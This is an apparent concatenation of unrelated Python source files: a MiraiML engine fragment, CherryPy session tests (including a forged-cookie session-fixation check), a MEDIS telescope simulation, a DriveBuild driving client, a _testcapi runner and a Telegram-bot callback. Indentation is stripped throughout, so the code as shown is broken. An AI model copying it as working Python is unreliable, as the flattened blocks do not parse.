while not self.must_interrupt:
gc.collect()
start = time.time()
for search_space in self.config.search_spaces:
self.__check_stagnation__()
if self.must_interrupt:
break
id = search_space.id
base_model = self.mirai_seeker.seek(id)
train_predictions, test_predictions, score = base_model.predict(
self.train_data, self.train_target,
self.test_data, self.config)
self.mirai_seeker.register_base_model(id, base_model, score)
if score > self.scores[id] or (
score == self.scores[id] and
len(base_model.features) < len(self.base_models[id].features)
):
self.scores[id] = score
self.train_predictions_df[id] = train_predictions
self.test_predictions_df[id] = test_predictions
self.__update_best__(score, id)
if will_ensemble:
self.ensembler.update()
self.__update_best__(self.scores[ensemble_id], ensemble_id)
self.__improvement_trigger__()
dump_base_model(base_model, self.models_dir + id)
else:
del train_predictions, test_predictions
total_cycles_duration += time.time() - start
self.n_cycles += 1
if will_ensemble:
if self.ensembler.optimize(total_cycles_duration/self.n_cycles):
self.__update_best__(self.scores[ensemble_id], ensemble_id)
self.__improvement_trigger__()
self.__is_running__ = False
def request_status(self):
"""
Queries the current status of the engine.
:rtype: miraiml.Status
:returns: The current status of the engine as a :class:`miraiml.Status`
object, or ``None`` if no score has been computed yet.
"""
if self.best_id is None:
return None
train_predictions = None
if self.train_predictions_df is not None:
train_predictions = self.train_predictions_df.copy()
test_predictions = None
if self.test_data is not None and self.test_predictions_df is not None:
test_predictions = self.test_predictions_df.copy()
ensemble_weights = None
if self.ensembler is not None:
ensemble_weights = self.ensembler.weights.copy()
base_models = {}
for id in self.base_models:
base_model = self.base_models[id]
base_models[id] = dict(
model_class=base_model.model_class.__name__,
parameters=base_model.parameters.copy()
)
base_models[id]['features'] = [
self.columns_renaming_unmap[col] for col in base_model.features
]
histories = None
if self.mirai_seeker is not None:
histories = {}
for id in self.mirai_seeker.histories:
histories[id] = self.mirai_seeker.histories[id].copy()
return Status(
best_id=self.best_id,
scores=self.scores.copy(),
train_predictions=train_predictions,
test_predictions=test_predictions,
ensemble_weights=ensemble_weights,
base_models=base_models,
histories=histories
)
class Status:
"""
Represents the current status of the engine. Objects of this class are
not supposed to be instantiated by the user. Rather, they are returned
by the :func:`miraiml.Engine.request_status()` method.
The following attributes are accessible:
* ``best_id``: the id of the best base model (or ensemble)
* ``scores``: a dictionary containing the current score of each id
* ``train_predictions``: a ``pandas.DataFrame`` object containing the predictions\
for the train data for each id
* ``test_predictions``: a ``pandas.DataFrame`` object containing the predictions\
for the test data for each id
* ``ensemble_weights``: a dictionary containing the ensemble weights for\
each base model id
* ``base_models``: a dictionary containing the characteristics of each base\
model (accessed by its respective id)
* ``histories``: a dictionary of ``pandas.DataFrame`` objects for each id,\
containing the history of base model attempts and their respective scores.\
Hyperparameters columns end with the ``'__(hyperparameter)'`` suffix and\
features columns end with the ``'__(feature)'`` suffix. The score column\
can be accessed with the key ``'score'``. For more information, please\
check the :ref:`User Guide <mirai_seeker>`.
The characteristics of each base model are represented by dictionaries containing
the following keys:
* ``'model_class'``: The name of the base model's modeling class
* ``'parameters'``: The dictionary of hyperparameter values
* ``'features'``: The list of features used
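A minimal sketch of inspecting a status object (assuming a running
:class:`miraiml.Engine` instance named ``engine`` that has already scored at
least one id):
:Example:
::
>>> status = engine.request_status()
>>> if status is not None:
...     print(status.best_id, status.scores[status.best_id])
...     print(status.build_report(include_features=False))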
"""
def __init__(self, **kwargs):
self.__dict__ = kwargs
def build_report(self, include_features=False):
"""
Returns the report of the current status of the engine in a formatted
string.
:type include_features: bool, optional, default=False
:param include_features: Whether to include the list of features on the
report or not (may cause some visual mess).
:rtype: str
:returns: The formatted report.
"""
output = '########################\n'
output += ('best id: {}\n'.format(self.best_id))
output += ('best score: {}\n'.format(self.scores[self.best_id]))
if self.ensemble_weights is not None:
output += ('########################\n')
output += ('ensemble weights:\n')
weights_ = {}
for id in self.ensemble_weights:
weights_[self.ensemble_weights[id]] = id
for weight in reversed(sorted(weights_)):
id = weights_[weight]
output += (' {}: {}\n'.format(id, weight))
output += ('########################\n')
output += ('all scores:\n')
scores_ = {}
for id in self.scores:
scores_[self.scores[id]] = id
for score in reversed(sorted(scores_)):
id = scores_[score]
output += (' {}: {}\n'.format(id, score))
for id in sorted(self.base_models):
base_model = self.base_models[id]
features = sorted([str(feature) for feature in base_model['features']])
output += ('########################\n')
output += ('id: {}\n'.format(id))
output += ('model class: {}\n'.format(base_model['model_class']))
output += ('n features: {}\n'.format(len(features)))
output += ('parameters:\n')
parameters = base_model['parameters']
for parameter in sorted(parameters):
value = parameters[parameter]
output += (' {}: {}\n'.format(parameter, value))
if include_features:
output += ('features: {}\n'.format(', '.join(features)))
return output
|
test_session.py
|
import os
localDir = os.path.dirname(__file__)
import sys
import threading
import time
import cherrypy
from cherrypy._cpcompat import copykeys, HTTPConnection, HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib.httputil import response_codes
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ", ".join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
class Root:
_cp_config = {'tools.sessions.on': True,
'tools.sessions.storage_type' : 'ram',
'tools.sessions.storage_path' : localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
}
def clear(self):
cherrypy.session.cache.clear()
clear.exposed = True
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
data.exposed = True
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
testGen.exposed = True
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
testStr.exposed = True
def setsessiontype(self, newtype):
self.__class__._cp_config.update({'tools.sessions.storage_type': newtype})
if hasattr(cherrypy, "session"):
del cherrypy.session
cls = getattr(sessions, newtype.title() + 'Session')
if cls.clean_thread:
cls.clean_thread.stop()
cls.clean_thread.unsubscribe()
del cls.clean_thread
setsessiontype.exposed = True
setsessiontype._cp_config = {'tools.sessions.on': False}
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
index.exposed = True
def keyin(self, key):
return str(key in cherrypy.session)
keyin.exposed = True
def delete(self):
cherrypy.session.delete()
sessions.expire()
return "done"
delete.exposed = True
def delkey(self, key):
del cherrypy.session[key]
return "OK"
delkey.exposed = True
def blah(self):
return self._cp_config['tools.sessions.storage_type']
blah.exposed = True
def iredir(self):
raise cherrypy.InternalRedirect('/blah')
iredir.exposed = True
def restricted(self):
return cherrypy.request.method
restricted.exposed = True
restricted._cp_config = {'tools.allow.on': True,
'tools.allow.methods': ['GET']}
def regen(self):
cherrypy.tools.sessions.regenerate()
return "logged in"
regen.exposed = True
def length(self):
return str(len(cherrypy.session))
length.exposed = True
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
session_cookie.exposed = True
session_cookie._cp_config = {
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False}
cherrypy.tree.mount(Root())
from cherrypy.test import helper
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
def test_0_Session(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertBody("{'aha': 'foo', 'counter': 3}")
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/setsessiontype/file')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
self.getPage('/delete', cookieset1)
self.assertBody("done")
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/setsessiontype/ram')
self._test_Concurrency()
def test_2_File_Concurrency(self):
self.getPage('/setsessiontype/file')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("file")
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
path = os.path.join(localDir, "session-" + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/testStr',
headers=[('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()), set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail("The second session did not time out.")
else:
self.fail("Unknown session id in cache: %r", cache)
import socket
try:
import memcache
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip("memcached not reachable ")
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage('/setsessiontype/memcached')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody("NotImplementedError")
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage("/", cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = v = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("memcached")
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
get_photon_data.py
|
"""Top level code that takes a atmosphere phase map and propagates a wavefront through the system"""
import os
import numpy as np
import traceback
import multiprocessing
import glob
import random
import pickle as pickle
import time
from proper_mod import prop_run
from medis.Utils.plot_tools import quicklook_im, view_datacube, loop_frames
from medis.Utils.misc import dprint
from medis.params import ap,cp,tp,mp,sp,iop,dp
import medis.Detector.MKIDs as MKIDs
import medis.Detector.H2RG as H2RG
import medis.Detector.pipeline as pipe
import medis.Detector.readout as read
import medis.Telescope.aberrations as aber
import medis.Atmosphere.atmos as atmos
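# Sentinel value pushed onto the input queue by run_medis to tell each
# gen_timeseries worker that no more time steps are coming
# (consumed via iter(inqueue.get, sentinel)).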
sentinel = None
def gen_timeseries(inqueue, photon_table_queue, outqueue, conf_obj_tup):
"""
generates observation sequence by calling optics_propagate in time series
is the time loop wrapper for optics_propagate
this is where the observation sequence is generated (timeseries of observations by the detector)
thus, where the detector observes the wavefront created by optics_propagate (for MKIDs, the probability distribution)
:param inqueue: time index for parallelization (used by multiprocess)
:param photon_table_queue: photon table (list of photon packets) in the multiprocessing format
:param outqueue: series of intensity images (spectral image cube) in the multiprocessing format
:param conf_obj_tup: tuple of configuration objects (tp, ap, sp, iop, cp, mp)
:return:
"""
# TODO change this name
(tp,ap,sp,iop,cp,mp) = conf_obj_tup
try:
if tp.detector == 'MKIDs':
with open(iop.device_params, 'rb') as handle:
dp = pickle.load(handle)
start = time.time()
for it, t in enumerate(iter(inqueue.get, sentinel)):
kwargs = {'iter': t, 'params': [ap, tp, iop, sp]}
_, save_E_fields = prop_run('medis.Telescope.optics_propagate', 1, ap.grid_size, PASSVALUE=kwargs,
VERBOSE=False, PHASE_OFFSET=1)
print(save_E_fields.shape)
spectralcube = np.sum(np.abs(save_E_fields[-1, :, :]) ** 2, axis=1)
if tp.detector == 'ideal':
image = np.sum(spectralcube, axis=0)
vmin = np.min(spectralcube)*10
# cube = ideal.assign_calibtime(spectralcube,PASSVALUE['iter'])
# cube = rawImageIO.arange_into_cube(packets, value='phase')
# rawImageIO.make_phase_map(cube, plot=True)
# return ''
elif tp.detector == 'MKIDs':
packets = read.get_packets(spectralcube, t, dp, mp)
# packets = read.get_packets(save_E_fields, t, dp, mp)
# if sp.show_wframe or sp.show_cube or sp.return_spectralcube:
cube = pipe.arange_into_cube(packets, (mp.array_size[0], mp.array_size[1]))
if mp.remove_close:
timecube = read.remove_close_photons(cube)
if sp.show_wframe:
image = pipe.make_intensity_map(cube, (mp.array_size[0], mp.array_size[1]))
# Interpolating spectral cube from ap.nwsamp discrete wavelengths
# if sp.show_cube or sp.return_spectralcube:
spectralcube = pipe.make_datacube(cube, (mp.array_size[0], mp.array_size[1], ap.w_bins))
if sp.save_obs:
command = read.get_obs_command(packets,t)
photon_table_queue.put(command)
vmin = 0.9
if sp.show_wframe:
dprint((sp.show_wframe, sp.show_wframe == 'continuous'))
quicklook_im(image, logAmp=True, show=sp.show_wframe, vmin=vmin)
if sp.show_cube:
view_datacube(spectralcube, logAmp=True, vmin=vmin)
if sp.use_gui:
gui_images = np.zeros_like(save_E_fields, dtype=np.float)
phase_ind = sp.gui_map_type == 'phase'
amp_ind = sp.gui_map_type == 'amp'
gui_images[phase_ind] = np.angle(save_E_fields[phase_ind], deg=False)
gui_images[amp_ind] = np.absolute(save_E_fields[amp_ind])
outqueue.put((t, gui_images, spectralcube))
elif sp.return_E:
outqueue.put((t, save_E_fields))
else:
outqueue.put((t, spectralcube))
now = time.time()
elapsed = float(now - start) / 60.
each_iter = float(elapsed) / (it + 1)
print('***********************************')
dprint(f'{elapsed:.2f} minutes elapsed, each time step took {each_iter:.2f} minutes') #* ap.numframes/sp.num_processes TODO change to log #
except Exception as e:
traceback.print_exc()
# raise e
pass
def wait_until(somepredicate, timeout, period=0.25, *args, **kwargs):
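"""Poll somepredicate(*args, **kwargs) every `period` seconds until it returns a
truthy value or `timeout` seconds elapse; returns True on success, False on timeout."""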
mustend = time.time() + timeout
while time.time() < mustend:
if somepredicate(*args, **kwargs): return True
time.sleep(period)
return False
def run_medis(EfieldsThread=None, plot=False):
"""
main script to organize calls to various aspects of the simulation
initialize different sub-processes, such as atmosphere and aberration maps, MKID device parameters
sets up the multiprocessing features
returns the observation sequence created by gen_timeseries
:return: obs_sequence
"""
# Printing Params
dprint("Checking Params Info-print params from here (turn on/off)")
# TODO change this to a logging function
# for param in [ap, cp, tp, mp, sp, iop]:
# print('\n', param)
# pprint(param.__dict__)
iop.makedir() # make the directories at this point in case the user doesn't want to keep changing params.py
check = read.check_exists_obs_sequence(plot)
if check:
if iop.obs_seq[-3:] == '.h5':
obs_sequence = read.open_obs_sequence_hdf5(iop.obs_seq)
else:
obs_sequence = read.open_obs_sequence(iop.obs_seq)
return obs_sequence
begin = time.time()
print('Creating New MEDIS Simulation')
print('********** Taking Obs Data ***********')
try:
multiprocessing.set_start_method('spawn')
except RuntimeError:
pass
# initialize atmosphere
print("Atmosdir = %s " % iop.atmosdir)
if tp.use_atmos and glob.glob(iop.atmosdir + '/*.fits') == []:
atmos.generate_maps()
# initialize telescope
if (tp.aber_params['QuasiStatic'] is True) and glob.glob(iop.aberdir + 'quasi/*.fits') == []:
aber.generate_maps(tp.f_lens)
if tp.aber_params['NCPA']:
aber.generate_maps(tp.f_lens, 'NCPA', 'lens')
# if tp.servo_error:
# aber.createObjMapsEmpty()
aber.initialize_CPA_meas()
if tp.active_null:
aber.initialize_NCPA_meas()
if sp.save_locs is None:
sp.save_locs = []
if 'detector' not in sp.save_locs:
sp.save_locs = np.append(sp.save_locs, 'detector')
sp.gui_map_type = np.append(sp.gui_map_type, 'amp')
# initialize MKIDs
if tp.detector == 'MKIDs' and not os.path.isfile(iop.device_params):
MKIDs.initialize()
photon_table_queue = multiprocessing.Queue()
inqueue = multiprocessing.Queue()
outqueue = multiprocessing.Queue()
jobs = []
if sp.save_obs and tp.detector == 'MKIDs':
proc = multiprocessing.Process(target=read.handle_output, args=(photon_table_queue, iop.obsfile))
proc.start()
if ap.companion is False:
ap.contrast = []
if tp.detector == 'MKIDs':
obs_sequence = np.zeros((ap.numframes, ap.w_bins, mp.array_size[1], mp.array_size[0]))
else:
obs_sequence = np.zeros((ap.numframes, ap.w_bins, ap.grid_size, ap.grid_size))
if sp.return_E:
e_fields_sequence = np.zeros((ap.numframes, len(sp.save_locs),
ap.nwsamp, 1 + len(ap.contrast),
ap.grid_size, ap.grid_size), dtype=np.complex64)
else:
e_fields_sequence = None
# Sending Queues to gen_timeseries
for i in range(sp.num_processes):
p = multiprocessing.Process(target=gen_timeseries, args=(inqueue, photon_table_queue, outqueue, (tp,ap,sp,iop,cp,mp)))
jobs.append(p)
p.start()
if tp.quick_ao:
for t in range(ap.startframe, ap.startframe + ap.numframes):
inqueue.put(t)
if sp.use_gui:
it, gui_images, spectralcube = outqueue.get()
while sp.play_gui is False:
time.sleep(0.005)
EfieldsThread.newSample.emit(gui_images)
EfieldsThread.sct.newSample.emit((it, spectralcube))
else:
dprint('If the code has hung here it probably means it cannot read the CPA file at some iteration')
for t in range(ap.startframe, ap.startframe+ap.numframes):
# time.sleep(rollout[t])
print(t)
if not tp.active_null:
with open(iop.CPA_meas, 'rb') as handle:
_, iters = pickle.load(handle)
# print t, iter, 't, iter'
print(iters, 'iters')
while iters[0] + ap.startframe < t:
time.sleep(0.1)
print('looping', t)
try:
with open(iop.CPA_meas, 'rb') as handle:
_, iters = pickle.load(handle)
iter = iters[0]
# sys.stdout.write("\rWaiting for aberration measurements...\n")
# sys.stdout.flush()
except EOFError:
print('Errored')
else:
with open(iop.NCPA_meas, 'rb') as handle:
_,_, iter = pickle.load(handle)
while iter < t:
time.sleep(0.1)
try:
with open(iop.NCPA_meas, 'rb') as handle:
_,_, iter = pickle.load(handle)
# sys.stdout.write("\rWaiting for aberration measurements...\n")
# sys.stdout.flush()
except EOFError:
print('Errored')
# if t in delay_inds:
# with open(iop.NCPA_meas, 'rb') as handle:
# _, _, iter = pickle.load(handle)
# print iter, t
# while iter != t:
# with open(iop.NCPA_meas, 'rb') as handle:
# _, _, iter = pickle.load(handle)
# # wait_until()
inqueue.put(t)
for i in range(sp.num_processes):
# Send the sentinel to tell each gen_timeseries worker to end
inqueue.put(sentinel)
for t in range(ap.numframes):
if sp.return_E:
t, save_E_fields = outqueue.get()
e_fields_sequence[t - ap.startframe] = save_E_fields
else:
t, spectralcube = outqueue.get()
obs_sequence[t - ap.startframe] = spectralcube # should be in the right order now because of the identifier
# for i, p in enumerate(jobs):
# p.join()
photon_table_queue.put(None)
outqueue.put(None)
if sp.save_obs and tp.detector == 'MKIDs':
proc.join()
obs_sequence = np.array(obs_sequence)
print('MEDIS Data Run Completed')
finish = time.time()
if sp.timing is True:
print(f'Time elapsed: {(finish-begin)/60:.2f} minutes')
print('**************************************')
print(f"Shape of obs_sequence = {np.shape(obs_sequence)}")
if tp.detector == 'H2RG':
obs_sequence = H2RG.scale_to_luminos(obs_sequence)
if tp.detector == 'H2RG' and hp.use_readnoise:
obs_sequence = H2RG.add_readnoise(obs_sequence, hp.readnoise)
if sp.return_E:
read.save_fields(e_fields_sequence, fields_file=iop.fields)
return e_fields_sequence
else:
dprint("Saving obs_sequence as hdf5 file:")
read.save_obs_sequence(obs_sequence, obs_seq_file=iop.obs_seq)
return obs_sequence
if __name__ == '__main__':
sp.timing = True
run_medis()
|
manual_ai.py
|
from threading import Thread
from typing import List
from pathlib import Path
from drivebuildclient.aiExchangeMessages_pb2 import SimulationID
def _handle_vehicle(sid: SimulationID, vid: str, requests: List[str]) -> None:
vid_obj = VehicleID()
vid_obj.vid = vid
while True:
print(sid.sid + ": Test status: " + service.get_status(sid))
print(vid + ": Wait")
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
if sim_state is SimStateResponse.SimState.RUNNING:
print(vid + ": Request data")
request = DataRequest()
request.request_ids.extend(requests)
data = service.request_data(sid, vid_obj, request) # request()
# print(data)
print(vid + ": Wait for control")
control = Control()
while not is_pressed("space"): # Wait for the user to trigger manual drive
pass
print(vid + ": Control")
if is_pressed("s"):
control.simCommand.command = Control.SimCommand.Command.SUCCEED
elif is_pressed("f"):
control.simCommand.command = Control.SimCommand.Command.FAIL
elif is_pressed("c"):
control.simCommand.command = Control.SimCommand.Command.CANCEL
else:
accelerate = 0
steer = 0
brake = 0
if is_pressed("up"):
accelerate = 1
if is_pressed("down"):
brake = 1
if is_pressed("right"):
steer = steer + 1
if is_pressed("left"):
steer = steer - 1
control.avCommand.accelerate = accelerate
control.avCommand.steer = steer
control.avCommand.brake = brake
service.control(sid, vid_obj, control) # control()
else:
print(sid.sid + ": The simulation is not running anymore (State: "
+ SimStateResponse.SimState.Name(sim_state) + ").")
print(sid.sid + ": Final result: " + service.get_result(sid))
break
if __name__ == "__main__":
from drivebuildclient.AIExchangeService import AIExchangeService
from drivebuildclient.aiExchangeMessages_pb2 import SimStateResponse, Control, SimulationID, VehicleID, DataRequest
from keyboard import is_pressed
service = AIExchangeService("localhost", 8383)
# Send tests
submission_result = service.run_tests("test", "test", Path("criteriaA.dbc.xml"), Path("environmentA.dbe.xml"))
# Interact with a simulation
if submission_result and submission_result.submissions:
for test_name, sid in submission_result.submissions.items():
ego_requests = ["egoPosition", "egoSpeed", "egoSteeringAngle", "egoFrontCamera", "egoLidar", "egoLaneDist"]
non_ego_requests = ["nonEgoPosition", "nonEgoSpeed", "nonEgoSteeringAngle", "nonEgoLeftCamera", "nonEgoLidar",
"nonEgoLaneDist"]
ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "ego", ego_requests))
ego_vehicle.start()
non_ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "nonEgo", non_ego_requests))
non_ego_vehicle.start()
ego_vehicle.join()
non_ego_vehicle.join()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by definition,
# these are all functions _testcapi exports whose name begins with 'test_'.
import sys
from test import test_support
import _testcapi
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if test_support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise test_support.TestFailed, sys.exc_info()[1]
# some extra thread-state tests driven via _testcapi
def TestThreadState():
import thread
import time
if test_support.verbose:
print "auto-thread-state"
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(thread.get_ident()) != 3:
raise test_support.TestFailed, \
"Couldn't find main thread correctly in the list"
try:
_testcapi._test_thread_state
have_thread_state = True
except AttributeError:
have_thread_state = False
if have_thread_state:
TestThreadState()
import threading
t=threading.Thread(target=TestThreadState)
t.start()
|
callback.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram.types import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
